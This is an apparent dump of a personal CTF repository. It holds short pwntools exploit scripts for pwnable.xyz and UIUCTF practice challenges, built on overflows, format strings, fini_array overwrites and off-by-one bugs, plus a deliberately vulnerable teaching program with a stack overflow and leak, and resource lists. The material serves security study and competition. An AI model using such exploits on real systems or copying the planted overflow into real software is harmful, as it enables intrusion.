remote('svc.pwnable.xyz',30002) 10 | 11 | r.sendlineafter('Input: ',str(win)+' '+str(0)+' '+str(13)) 12 | r.sendlineafter('Input: 
','M30W') 13 | 14 | r.interactive() 15 | -------------------------------------------------------------------------------- /Practice/Pwnable.xyz/AdultVM/kernel: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.xyz/AdultVM/kernel -------------------------------------------------------------------------------- /Practice/Pwnable.xyz/AdultVM/userland: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.xyz/AdultVM/userland -------------------------------------------------------------------------------- /Practice/Pwnable.xyz/Attack/attack: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.xyz/Attack/attack -------------------------------------------------------------------------------- /Practice/Pwnable.xyz/BabyVM/babyvm: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.xyz/BabyVM/babyvm -------------------------------------------------------------------------------- /Practice/Pwnable.xyz/Badayum/badayum: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.xyz/Badayum/badayum -------------------------------------------------------------------------------- /Practice/Pwnable.xyz/Bookmark/bookmark: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.xyz/Bookmark/bookmark 
-------------------------------------------------------------------------------- /Practice/Pwnable.xyz/Bookmark/exp.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | ###Util 4 | def create(protocol,size,data): 5 | r.sendlineafter('> ','2') 6 | r.sendafter('insecure: ',protocol) 7 | r.sendafter('url: ',str(size).ljust(0x20,'a')) 8 | r.send(data) 9 | 10 | def get_flag(): 11 | r.sendlineafter('> ','4') 12 | 13 | ###Exploit 14 | r = remote('svc.pwnable.xyz',30021) 15 | ###BOF with logic error into login check buf 16 | for i in range(3): 17 | create('https',0x7f,':'*0x7f) 18 | ###Get flag 19 | get_flag() 20 | r.interactive() 21 | -------------------------------------------------------------------------------- /Practice/Pwnable.xyz/Car_shop/car_shop: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.xyz/Car_shop/car_shop -------------------------------------------------------------------------------- /Practice/Pwnable.xyz/Catalog/catalog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.xyz/Catalog/catalog -------------------------------------------------------------------------------- /Practice/Pwnable.xyz/Child/child: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.xyz/Child/child -------------------------------------------------------------------------------- /Practice/Pwnable.xyz/Dirty_Turtle/dirty_turtle: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.xyz/Dirty_Turtle/dirty_turtle -------------------------------------------------------------------------------- /Practice/Pwnable.xyz/Dirty_Turtle/exp.py: -------------------------------------------------------------------------------- 1 | ###no-relro -> fini_array is writeable 2 | 3 | from pwn import * 4 | 5 | ###Addr 6 | fini_array = 0x600bc0 7 | win = 0x400821 8 | 9 | ###Exploit 10 | r = remote('svc.pwnable.xyz',30033) 11 | r.sendlineafter('Addr: ',str(fini_array)) 12 | r.sendlineafter('Value: ',str(win)) 13 | r.interactive() 14 | -------------------------------------------------------------------------------- /Practice/Pwnable.xyz/Door/door: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.xyz/Door/door -------------------------------------------------------------------------------- /Practice/Pwnable.xyz/Executioner/executioner: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.xyz/Executioner/executioner -------------------------------------------------------------------------------- /Practice/Pwnable.xyz/ExecutionerV2/executionerv2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.xyz/ExecutionerV2/executionerv2 -------------------------------------------------------------------------------- /Practice/Pwnable.xyz/Fclose/fclose: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.xyz/Fclose/fclose 
-------------------------------------------------------------------------------- /Practice/Pwnable.xyz/Fishing/fishing: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.xyz/Fishing/fishing -------------------------------------------------------------------------------- /Practice/Pwnable.xyz/Free_spirit/free_spirit: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.xyz/Free_spirit/free_spirit -------------------------------------------------------------------------------- /Practice/Pwnable.xyz/Fspoo/fspoo: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.xyz/Fspoo/fspoo -------------------------------------------------------------------------------- /Practice/Pwnable.xyz/Game/game: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.xyz/Game/game -------------------------------------------------------------------------------- /Practice/Pwnable.xyz/Grownup/exp.py: -------------------------------------------------------------------------------- 1 | ###Hijack fmt pointer with off-by-one-null 2 | ###Then use format string to print out flag(which pointer is on stack) 3 | 4 | from pwn import * 5 | 6 | ###Addr 7 | flag = 0x601080 8 | 9 | ###Exploit 10 | r = remote('svc.pwnable.xyz',30004) 11 | r.sendafter('[y/N]: ',b'y'.ljust(8,b'\x00')+p64(flag)) 12 | r.sendafter('Name: ',b'a'*0x20+b'%9$s'.ljust(0x60,b'a')) 13 | r.interactive() 14 | -------------------------------------------------------------------------------- 
/Practice/Pwnable.xyz/Grownup/grownup: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.xyz/Grownup/grownup -------------------------------------------------------------------------------- /Practice/Pwnable.xyz/Hero_Factory/exp.py: -------------------------------------------------------------------------------- 1 | ###Off by one NULL in strncat 2 | 3 | from pwn import * 4 | 5 | ###Util 6 | def create(size,data,skill): 7 | r.sendlineafter('> ','1') 8 | r.sendlineafter('be? \n',str(size)) 9 | r.sendafter('name: ',data) 10 | r.sendlineafter('> ',str(skill)) 11 | 12 | def skill(): 13 | r.sendlineafter('> ','2') 14 | 15 | 16 | ###Addr 17 | win = 0x400a33 18 | 19 | ###Exploit 20 | r = remote('svc.pwnable.xyz',30032) 21 | create(0x64,'a'*0x64,0) 22 | create(0x64,b'a'*7+p64(win),5) 23 | skill() 24 | r.interactive() 25 | -------------------------------------------------------------------------------- /Practice/Pwnable.xyz/Hero_Factory/hero_factory: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.xyz/Hero_Factory/hero_factory -------------------------------------------------------------------------------- /Practice/Pwnable.xyz/Iape/iape: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.xyz/Iape/iape -------------------------------------------------------------------------------- /Practice/Pwnable.xyz/JMP_table/exp.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | ###Util 4 | def create(size): 5 | r.sendlineafter('> ','1') 6 | r.sendlineafter('Size: ',str(size)) 7 | 8 | def call_size(): 9 | r.sendlineafter('> 
','-2') 10 | 11 | ###Addr 12 | flag = 0x400a31 13 | 14 | ###Exploit 15 | r = remote('svc.pwnable.xyz',30007) 16 | create(flag) 17 | call_size() 18 | 19 | r.interactive() 20 | -------------------------------------------------------------------------------- /Practice/Pwnable.xyz/JMP_table/jmp_table: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.xyz/JMP_table/jmp_table -------------------------------------------------------------------------------- /Practice/Pwnable.xyz/JUMP/jump: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.xyz/JUMP/jump -------------------------------------------------------------------------------- /Practice/Pwnable.xyz/Knum/knum: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.xyz/Knum/knum -------------------------------------------------------------------------------- /Practice/Pwnable.xyz/L33t_ness/exp.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | r = remote('svc.pwnable.xyz',30008) 4 | 5 | ###level1 6 | r.sendlineafter('x: ',str(0)) 7 | r.sendlineafter('y: ',str(0x100000000-1337)) 8 | 9 | ###level2 10 | r.sendlineafter('=== t00leet ===\n',str(9*12289)+' '+str(38833)) 11 | 12 | ###level3 13 | r.sendlineafter('=== 3leet ===\n','-2 -1 0 1 2') 14 | 15 | r.interactive() 16 | -------------------------------------------------------------------------------- /Practice/Pwnable.xyz/L33t_ness/l33t_ness: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.xyz/L33t_ness/l33t_ness -------------------------------------------------------------------------------- /Practice/Pwnable.xyz/Message/message: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.xyz/Message/message -------------------------------------------------------------------------------- /Practice/Pwnable.xyz/Misalignment/exp.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | r = remote('svc.pwnable.xyz',30003) 4 | r.sendline(str(0xb500000000000000-0x10000000000000000)+' '+str(0)+' '+str(-6)) 5 | r.sendline(str(0xb000000)+' '+str(0)+' '+str(-5)) 6 | r.sendline('M30W') 7 | r.interactive() 8 | -------------------------------------------------------------------------------- /Practice/Pwnable.xyz/Misalignment/misalignment: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.xyz/Misalignment/misalignment -------------------------------------------------------------------------------- /Practice/Pwnable.xyz/Nin/nin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.xyz/Nin/nin -------------------------------------------------------------------------------- /Practice/Pwnable.xyz/Note/note: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.xyz/Note/note -------------------------------------------------------------------------------- /Practice/Pwnable.xyz/NoteV2/notev2: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.xyz/NoteV2/notev2 -------------------------------------------------------------------------------- /Practice/Pwnable.xyz/NoteV3/notev3: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.xyz/NoteV3/notev3 -------------------------------------------------------------------------------- /Practice/Pwnable.xyz/NoteV4/notev4: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.xyz/NoteV4/notev4 -------------------------------------------------------------------------------- /Practice/Pwnable.xyz/NoteV5/notev5: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.xyz/NoteV5/notev5 -------------------------------------------------------------------------------- /Practice/Pwnable.xyz/Notebook/notebook: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.xyz/Notebook/notebook -------------------------------------------------------------------------------- /Practice/Pwnable.xyz/Password/password: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.xyz/Password/password -------------------------------------------------------------------------------- /Practice/Pwnable.xyz/Punch_it/genrand.c: 
-------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | int main(){ 5 | srand(0); 6 | for(int i = 0;i<500;i++) 7 | printf("%d\n",rand()); 8 | return 0; 9 | } 10 | -------------------------------------------------------------------------------- /Practice/Pwnable.xyz/Punch_it/punch_it: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.xyz/Punch_it/punch_it -------------------------------------------------------------------------------- /Practice/Pwnable.xyz/PvE/pve: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.xyz/PvE/pve -------------------------------------------------------------------------------- /Practice/Pwnable.xyz/PvP/pvp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.xyz/PvP/pvp -------------------------------------------------------------------------------- /Practice/Pwnable.xyz/RWSR/rwsr: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.xyz/RWSR/rwsr -------------------------------------------------------------------------------- /Practice/Pwnable.xyz/SUS/sus: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.xyz/SUS/sus -------------------------------------------------------------------------------- /Practice/Pwnable.xyz/Strcat/strcat: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.xyz/Strcat/strcat -------------------------------------------------------------------------------- /Practice/Pwnable.xyz/Sub/exp.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | 4 | r = remote('svc.pwnable.xyz',30001) 5 | v4 = 0 6 | v5 = 0x100000000-4919 7 | r.sendlineafter('input: ',str(v4)+' '+str(v5)) 8 | r.interactive() 9 | -------------------------------------------------------------------------------- /Practice/Pwnable.xyz/Sub/sub: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.xyz/Sub/sub -------------------------------------------------------------------------------- /Practice/Pwnable.xyz/TLSv00/tlsv00: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.xyz/TLSv00/tlsv00 -------------------------------------------------------------------------------- /Practice/Pwnable.xyz/Two_target/two_target: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.xyz/Two_target/two_target -------------------------------------------------------------------------------- /Practice/Pwnable.xyz/UAF/uaf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.xyz/UAF/uaf -------------------------------------------------------------------------------- /Practice/Pwnable.xyz/Welcome/welcome: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.xyz/Welcome/welcome -------------------------------------------------------------------------------- /Practice/Pwnable.xyz/Words/words: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.xyz/Words/words -------------------------------------------------------------------------------- /Practice/Pwnable.xyz/World/genrand.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | 5 | int main(){ 6 | for(int i = 0;i<0x100;i++){ 7 | srand(i); 8 | for(int j = 0;j<50;j++) 9 | printf("%d%c",rand()%256,j==49?'\n':','); 10 | } 11 | return 0; 12 | } 13 | -------------------------------------------------------------------------------- /Practice/Pwnable.xyz/World/world: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.xyz/World/world -------------------------------------------------------------------------------- /Practice/Pwnable.xyz/XOR/xor: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.xyz/XOR/xor -------------------------------------------------------------------------------- /TIPS/crypto_resource: -------------------------------------------------------------------------------- 1 | xortool 2 | https://github.com/hellman/xortool 3 | 4 | substitution cipher 5 | https://quipqiup.com/ 6 | 7 | factorizer 8 | https://www.alpertron.com.ar/ECM.HTM 9 | http://factordb.com/index.php 10 | 11 | hashpump 12 | https://github.com/bwall/HashPump 13 | 14 | md5-tunnel 15 | https://github.com/s1fr0/md5-tunneling 16 | 17 | sage 18 | 
https://github.com/sagemath 19 | 20 | All kinds of sage scripts for RSA 21 | https://github.com/ValarDragon/CTF-Crypto/tree/master/RSA 22 | -------------------------------------------------------------------------------- /TIPS/python_resource: -------------------------------------------------------------------------------- 1 | bytecode disassembly 2 | pip install xdis 3 | -------------------------------------------------------------------------------- /TIPS/reverse_resource: -------------------------------------------------------------------------------- 1 | .NET decompile (dnSpy) 2 | https://github.com/0xd4d/dnSpy 3 | 4 | PE analysis 5 | https://github.com/zeroq/peanalysis 6 | 7 | 8 | ### 9 | IDA commands 10 | [edit] -> [patch program] -> [change byte] -> edit instruction 11 | u -> undefine instruction 12 | c -> mark assembly as code 13 | p -> mark offset as function 14 | -------------------------------------------------------------------------------- /TIPS/stego_resource: -------------------------------------------------------------------------------- 1 | stego veritas 2 | https://github.com/bannsec/stegoVeritas 3 | zsteg 4 | https://github.com/zed-0xff/zsteg 5 | -------------------------------------------------------------------------------- /Teaching/NTUComputerSecurity2020/Pwn1/CS2020_Pwn1.key: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Teaching/NTUComputerSecurity2020/Pwn1/CS2020_Pwn1.key -------------------------------------------------------------------------------- /Teaching/NTUComputerSecurity2020/Pwn1/Demo/leak: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Teaching/NTUComputerSecurity2020/Pwn1/Demo/leak -------------------------------------------------------------------------------- 
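// /Teaching/NTUComputerSecurity2020/Pwn1/Demo/leak.c: --------------------------------------------------------------------------------
/*
 * Teaching demo from the Pwn1 material: prints "how2leak", reads one input in
 * vuln(), echoes it back and prints "done".  The unsafe calls in vuln() are
 * the subject of the demo and are kept exactly as the author wrote them; the
 * comments mark what is unsafe and what production code would do instead.
 *
 * NOTE(review): the three header names were lost when this page was extracted
 * (the listing shows bare `#include` lines).  stdio.h and unistd.h are
 * required by the calls below; the third is presumably stdlib.h -- confirm
 * against the repository.
 */
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

/*
 * Read up to 0x100 bytes from stdin into a 0x10-byte stack buffer, print the
 * buffer as a C string, then wait for one more character.
 */
void vuln(){
    /* 16-byte buffer; the initialiser zero-fills all of it. */
    char buf[0x10]="\0";
    printf("Data : ");
    /*
     * Unsafe on purpose: the length given to read() (0x100) is larger than
     * buf (0x10), so longer input is written past the end of buf into the
     * rest of the stack frame.  read() does not append a terminator and its
     * return value is ignored.  Safe form: pass sizeof(buf) - 1 as the
     * length and terminate the buffer at the returned byte count.
     */
    read(STDIN_FILENO,buf,0x100);
    /*
     * "%s" prints until the first zero byte.  When the input leaves no
     * terminator inside buf, the output continues into the memory that
     * follows it, which is the disclosure this demo is named after.  A
     * bounded print ("%.*s" with the byte count from read()) avoids it.
     */
    printf("%s\n",buf);
    getchar();
    return;
}

/*
 * Entry point: switch the three standard streams to unbuffered mode, print
 * the banner, run vuln() once and print "done".
 */
int main(){
    /* _IONBF disables stdio buffering -- presumably so prompts show up
     * immediately when the program is driven through a pipe or socket. */
    setvbuf(stdin,NULL,_IONBF,0);
    setvbuf(stdout,NULL,_IONBF,0);
    setvbuf(stderr,NULL,_IONBF,0);

    puts("how2leak");
    vuln();
    puts("done");

    return 0;
}
// -------------------------------------------------------------------------------- /Teaching/NTUComputerSecurity2020/Pwn2/CS2020_Pwn2.key: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Teaching/NTUComputerSecurity2020/Pwn2/CS2020_Pwn2.key -------------------------------------------------------------------------------- /Teaching/NTUComputerSecurity2020/Pwn2/Demo/chunks: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Teaching/NTUComputerSecurity2020/Pwn2/Demo/chunks -------------------------------------------------------------------------------- /Teaching/NTUComputerSecurity2020/Pwn2/Demo/largebin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Teaching/NTUComputerSecurity2020/Pwn2/Demo/largebin -------------------------------------------------------------------------------- /Teaching/NTUComputerSecurity2020/Pwn2/Demo/smallbin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Teaching/NTUComputerSecurity2020/Pwn2/Demo/smallbin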
-------------------------------------------------------------------------------- /Teaching/NTUComputerSecurity2020/Pwn2/Demo/tcache_and_fastbin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Teaching/NTUComputerSecurity2020/Pwn2/Demo/tcache_and_fastbin -------------------------------------------------------------------------------- /Teaching/NTUComputerSecurity2020/Pwn2/Demo/unsortedbin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Teaching/NTUComputerSecurity2020/Pwn2/Demo/unsortedbin -------------------------------------------------------------------------------- /Writeups/0CTF2021/HashCollision/Collision.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Writeups/0CTF2021/HashCollision/Collision.zip -------------------------------------------------------------------------------- /Writeups/0CTF2021/README.md: -------------------------------------------------------------------------------- 1 | # 0CTF QUAL 2021 2 | 3 | Solved a bunch of challs this year, but too busy to make writeup for all of them... 
4 | 5 | Only Hash collision for now, might do writeup for other if I have time 6 | 7 | ## Challenges 8 | [Hash Collision](https://github.com/jwang-a/CTF/tree/master/Writeups/0CTF2021/HashCollision) 9 | -------------------------------------------------------------------------------- /Writeups/HitconQual2019/Pwn/Crypto_in_the_Shell/chall: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Writeups/HitconQual2019/Pwn/Crypto_in_the_Shell/chall -------------------------------------------------------------------------------- /Writeups/HitconQual2019/Pwn/EmojiVM/emojivm_reverse/emojivm: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Writeups/HitconQual2019/Pwn/EmojiVM/emojivm_reverse/emojivm -------------------------------------------------------------------------------- /Writeups/HitconQual2019/Pwn/Lazyhouse/lazyhouse: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Writeups/HitconQual2019/Pwn/Lazyhouse/lazyhouse -------------------------------------------------------------------------------- /Writeups/HitconQual2019/Pwn/One_Punch_Man/one_punch: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Writeups/HitconQual2019/Pwn/One_Punch_Man/one_punch -------------------------------------------------------------------------------- /Writeups/HitconQual2019/Pwn/Trick_or_Treat/trick_or_treat: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Writeups/HitconQual2019/Pwn/Trick_or_Treat/trick_or_treat -------------------------------------------------------------------------------- /Writeups/UIUCTF2020/Pwn/Accounting_Accidents/accounting: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Writeups/UIUCTF2020/Pwn/Accounting_Accidents/accounting -------------------------------------------------------------------------------- /Writeups/UIUCTF2020/Pwn/Accounting_Accidents/exp.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | ###Exploit 4 | r = remote('chal.uiuc.tf',2001) 5 | 6 | r.sendafter('Item: ',b'a'*0x10+p64(0x8048878)) 7 | r.sendlineafter('Cost: ','26') 8 | r.sendlineafter('Cost: ','27') 9 | r.sendlineafter('Cost: ','24') 10 | r.sendlineafter('Cost: ','23') 11 | r.interactive() 12 | -------------------------------------------------------------------------------- /Writeups/UIUCTF2020/Pwn/Gen_Z_Math_Class/src.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Writeups/UIUCTF2020/Pwn/Gen_Z_Math_Class/src.zip -------------------------------------------------------------------------------- /Writeups/UIUCTF2020/Pwn/MuJS/MuJS.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Writeups/UIUCTF2020/Pwn/MuJS/MuJS.zip -------------------------------------------------------------------------------- /Writeups/UIUCTF2020/Pwn/MuJS/README.md: -------------------------------------------------------------------------------- 1 | Writeup at hackmd : https://hackmd.io/@M30W/UIUCTF2020-MuJS-Writeup 2 | 
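# -------------------------------------------------------------------------------- /Writeups/UIUCTF2020/Pwn/Who_is_GDB/Dockerfile: -------------------------------------------------------------------------------- 1 | # gdbchal by kuilin 2 | 3 | FROM jaschac/debian-gcc:latest 4 | RUN apt-get update && apt-get install -y socat gdb 5 | 6 | COPY flag.txt / 7 | RUN chmod 644 /flag.txt 8 | 9 | RUN useradd pwn 10 | USER pwn 11 | 12 | EXPOSE 1234/tcp 13 | CMD socat -vv tcp-listen:1234,reuseaddr,fork system:'gdb -ex "target\\\ remote\\\ /proc/self/fd/10" /dev/null 2>/dev/null',pty,fdin=10,fdout=10 14 | -------------------------------------------------------------------------------- /utils/Crypto/CRT.py: --------------------------------------------------------------------------------
# Uses math.gcd and three-argument pow() (Python 3.8+) from the standard
# library instead of Crypto.Util.number: the earlier import named `Inverse`
# while the code called `inverse`, so the helper failed before computing
# anything.
from math import gcd


def CRT(items):
    """Solve a system of congruences with the Chinese Remainder Theorem.

    Args:
        items: iterable of entries whose first two elements are ``(a_i, n_i)``,
            each meaning ``x = a_i (mod n_i)``.

    Returns:
        The solution ``x`` reduced modulo ``N``, where ``N`` is the product of
        all moduli.  An empty input gives ``0``.

    Raises:
        ValueError: if the moduli are not pairwise coprime.  In that case the
            modular inverse used below does not exist and no unique solution
            modulo ``N`` is defined.

    Note:
        This is an analysis helper.  Arithmetic on Python integers is not
        constant-time, so it should not be reused on secret key material in
        production code.
    """
    # Materialise once so generators are accepted and can be walked twice.
    pairs = [(entry[0], entry[1]) for entry in items]

    N = 1
    for _, modulus in pairs:
        N *= modulus

    ans = 0
    for residue, modulus in pairs:
        cofactor = N // modulus
        # gcd(N / n_i, n_i) == 1 for every i is equivalent to the moduli being
        # pairwise coprime; checking it here gives a clear error instead of a
        # wrong answer.
        if gcd(cofactor, modulus) != 1:
            raise ValueError("CRT moduli must be pairwise coprime")
        ans += residue * cofactor * pow(cofactor, -1, modulus)
    return ans % N
# -------------------------------------------------------------------------------- /utils/Pwn/Shellcode.py: --------------------------------------------------------------------------------
###Test to see if running on amd64 or i386 using REX prefix
# if arch = amd64: jmp taken
# else : jmp not taken
x86_x64_SWITCH = b'j0X@<0t0'
# -------------------------------------------------------------------------------- /utils/Pwn/libc/x64/Libc23/ld64_2.23.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/utils/Pwn/libc/x64/Libc23/ld64_2.23.so --------------------------------------------------------------------------------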
